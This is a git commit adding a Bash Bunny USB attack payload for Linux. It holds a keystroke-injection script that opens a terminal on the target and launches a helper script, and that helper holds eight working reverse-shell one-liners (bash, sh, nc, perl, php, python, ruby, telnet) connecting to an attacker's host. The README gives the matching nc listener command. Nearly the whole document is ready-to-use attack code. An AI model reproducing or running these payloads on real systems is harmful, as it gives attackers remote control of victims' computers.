Linux Random Reverse Shell (#553)

1) Checks the availability of binaries on the system. 2) Builds a list of possible payloads. 3) Performs one at random.
2025-10-29 16:58:25 +00:00 · 2022-10-08 20:25:34 -04:00
parent 5738de5e9e
commit fa5dae9b11
3 changed files with 243 additions and 0 deletions
--- a/payloads/library/remote_access/linux_random-reverse-shell/README.md
+++ b/payloads/library/remote_access/linux_random-reverse-shell/README.md
@@ -0,0 +1,32 @@
 # Random Reverse Shell
 - Title:         Random Reverse Shell
 - Author:        TW-D
 - Version:       1.0
 - Target:        Linux
 - Category:      Remote Access
 ## Description
 1) Checks the availability of binaries on the system.
 2) Builds a list of possible payloads.
 3) Performs one at random.
 ## Configuration
 From "payload.txt" change the values of the following constant :
 ```bash
 ######## INITIALIZATION ########
 readonly BB_LABEL="BashBunny"
 readonly REMOTE_HOST="127.0.0.1"
 readonly REMOTE_PORT=54424
 ```
 ## Usage
 ```
 hacker@hacker-computer:~$ nc -lnvvp <REMOTE_PORT>
 ```
--- a/payloads/library/remote_access/linux_random-reverse-shell/payload.txt
+++ b/payloads/library/remote_access/linux_random-reverse-shell/payload.txt
@@ -0,0 +1,85 @@
 #!/bin/bash
 #
 # Title:            Random Reverse Shell
 # 
 # Description:
 #                   1) Checks the availability of binaries on the system.
 #                   2) Builds a list of possible payloads.
 #                   3) Performs one at random.
 #
 # Author:           TW-D
 # Version:          1.0
 # Category:         Remote Access
 # Target:           Linux
 # Attackmodes:      HID and STORAGE
 #
 # TESTED ON
 # ==========
 # Ubuntu 20.04.4 LTS x86_64 (Xfce)
 #
 # STATUS
 # ===============
 # Magenta solid ................................... SETUP
 # Yellow single blink ............................. ATTACK
 # Yellow double blink ............................. STAGE2
 # Yellow triple blink ............................. STAGE3
 # Yellow quadruple blink .......................... STAGE4
 # White fast blink ................................ CLEANUP
 # Green 1000ms VERYFAST blink followed by SOLID ... FINISH
 ######## INITIALIZATION ########
 readonly BB_LABEL="BashBunny"
 readonly REMOTE_HOST="127.0.0.1"
 readonly REMOTE_PORT=54424
 ######## SETUP ########
 LED SETUP
 ATTACKMODE HID STORAGE
 GET SWITCH_POSITION
 udisk mount
 ######## ATTACK ########
 LED ATTACK
 Q DELAY 7000
 Q CTRL-ALT t
 Q DELAY 5000
 LED STAGE2
 Q STRING " cd /media/\${USER}/${BB_LABEL}/payloads/${SWITCH_POSITION}/"
 Q ENTER
 Q DELAY 1500
 LED STAGE3
 Q STRING " chmod +x ./random_reverse-shell.sh"
 Q ENTER
 Q DELAY 1500
 Q STRING " \$BASH ./random_reverse-shell.sh ${REMOTE_HOST} ${REMOTE_PORT}"
 Q ENTER
 Q DELAY 3000
 LED STAGE4
 Q STRING " exit"
 Q ENTER
 Q DELAY 1000
 ######## CLEANUP ########
 LED CLEANUP
 sync
 udisk unmount
 ######## FINISH ########
 LED FINISH
 shutdown -h 0
--- a/payloads/library/remote_access/linux_random-reverse-shell/random_reverse-shell.sh
+++ b/payloads/library/remote_access/linux_random-reverse-shell/random_reverse-shell.sh
@@ -0,0 +1,126 @@
 #!/bin/bash
 #
 # Title:            Random Reverse Shell
 # 
 # Description:
 #                   1) Checks the availability of binaries on the system.
 #                   2) Builds a list of possible payloads.
 #                   3) Performs one at random.
 #
 # Author:           TW-D
 # Version:          1.0
 # Category:         Remote Access
 # Target:           Linux
 # Attackmodes:      HID and STORAGE
 #
 # TESTED ON
 # ==========
 # Ubuntu 20.04.4 LTS x86_64 (Xfce)
 #
 # USAGE
 # ==========
 # hacker@hacker-computer:~$ nc -lnvvp <REMOTE_PORT>
 # victim@victim-computer:~$ $BASH ./random_reverse-shell.sh <REMOTE_HOST> <REMOTE_PORT>
 #
 set -eo pipefail
 readonly REMOTE_HOST="${1}"
 readonly REMOTE_PORT="${2}"
 readonly RANDOM_FILENAME="${RANDOM}"
 readonly BINARIES_LIST=(
    "/bin/bash"
    "/bin/mkfifo"
    "/bin/cat"
    "/bin/nc"
    "/bin/perl"
    "/bin/php"
    "/bin/python"
    "/bin/ruby"
    "/bin/sh"
    "/bin/mknod"
    "/bin/telnet"
 )
 readonly BASH_PAYLOAD=$(cat <<EOF
 /bin/bash -i > /dev/tcp/${REMOTE_HOST}/${REMOTE_PORT} 0<&1 2>&1
 EOF
 )
 #
 # [CTRL + c]
 #
 readonly NC_PAYLOAD=$(cat <<EOF
 /bin/mkfifo /tmp/${RANDOM_FILENAME} && /bin/cat /tmp/${RANDOM_FILENAME} | ${BASH} -i 2>&1 | /bin/nc ${REMOTE_HOST} ${REMOTE_PORT} > /tmp/${RANDOM_FILENAME}
 EOF
 )
 #
 # Tested on Perl v5.30.0
 # [CTRL + c]
 #
 readonly PERL_PAYLOAD=$(cat <<EOF
 /bin/perl -X -MIO -e '\$socket = new IO::Socket::INET(PeerAddr, "${REMOTE_HOST}:${REMOTE_PORT}"); STDIN->fdopen(\$socket, "r"); ($~)->fdopen(\$socket, "w"); system(\$_) while<>'
 EOF
 )
 #
 # Tested on PHP v7.4.3
 #
 readonly PHP_PAYLOAD=$(cat <<EOF
 /bin/php -r '\$fsockopen = fsockopen("${REMOTE_HOST}", ${REMOTE_PORT}); exec("${BASH} -i <&3 >&3 2>&3");'
 EOF
 )
 #
 # Tested on Python v2.7.18
 #
 readonly PYTHON_PAYLOAD=$(cat <<EOF
 /bin/python -c 'import socket, os, subprocess; tcp_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM); tcp_socket.connect(("${REMOTE_HOST}", ${REMOTE_PORT})); os.dup2(tcp_socket.fileno(), 0); os.dup2(tcp_socket.fileno(), 1); os.dup2(tcp_socket.fileno(), 2); subprocess.call(["${BASH}", "-i"])'
 EOF
 )
 #
 # Tested on Ruby v2.7.0p0
 #
 readonly RUBY_PAYLOAD=$(cat <<EOF
 /bin/ruby -rsocket -e 'tcp_socket = TCPSocket.new("${REMOTE_HOST}", ${REMOTE_PORT}); while (command = tcp_socket.gets); command = (command.chomp).downcase; (command == "exit") ? break : tcp_socket.puts(\`#{command}\`) rescue nil; end; tcp_socket.close'
 EOF
 )
 readonly SH_PAYLOAD=$(cat <<EOF
 /bin/sh -i > /dev/tcp/${REMOTE_HOST}/${REMOTE_PORT} 0<&1 2>&1
 EOF
 )
 readonly TELNET_PAYLOAD=$(cat <<EOF
 /bin/mknod /tmp/${RANDOM_FILENAME} p && /bin/telnet ${REMOTE_HOST} ${REMOTE_PORT} 0</tmp/${RANDOM_FILENAME} | ${BASH} 1>/tmp/${RANDOM_FILENAME}
 EOF
 )
 set -u
 available_binaries=()
 for binary in "${BINARIES_LIST[@]}"; do
    if command -v "${binary}" > /dev/null 2>&1; then
        available_binaries+=("${binary}")
    fi
 done
 available_payloads=()
 [[ "${available_binaries[*]}" =~ "/bin/bash" ]] && available_payloads+=("${BASH_PAYLOAD}") || echo ""
 [[ "${available_binaries[*]}" =~ "/bin/mkfifo" && "${available_binaries[*]}" =~ "/bin/cat" && "${available_binaries[*]}" =~ "/bin/nc" ]] && available_payloads+=("${NC_PAYLOAD}") || echo ""
 [[ "${available_binaries[*]}" =~ "/bin/perl" ]] && available_payloads+=("${PERL_PAYLOAD}") || echo ""
 [[ "${available_binaries[*]}" =~ "/bin/php" ]] && available_payloads+=("${PHP_PAYLOAD}") || echo ""
 [[ "${available_binaries[*]}" =~ "/bin/python" ]] && available_payloads+=("${PYTHON_PAYLOAD}") || echo ""
 [[ "${available_binaries[*]}" =~ "/bin/ruby" ]] && available_payloads+=("${RUBY_PAYLOAD}") || echo ""
 [[ "${available_binaries[*]}" =~ "/bin/sh" ]] && available_payloads+=("${SH_PAYLOAD}") || echo ""
 [[ "${available_binaries[*]}" =~ "/bin/mknod" && "${available_binaries[*]}" =~ "/bin/telnet" ]] && available_payloads+=("${TELNET_PAYLOAD}") || echo ""
 random_payload=${available_payloads[$RANDOM % "${#available_payloads[@]}"]}
 $BASH -c "${random_payload}" &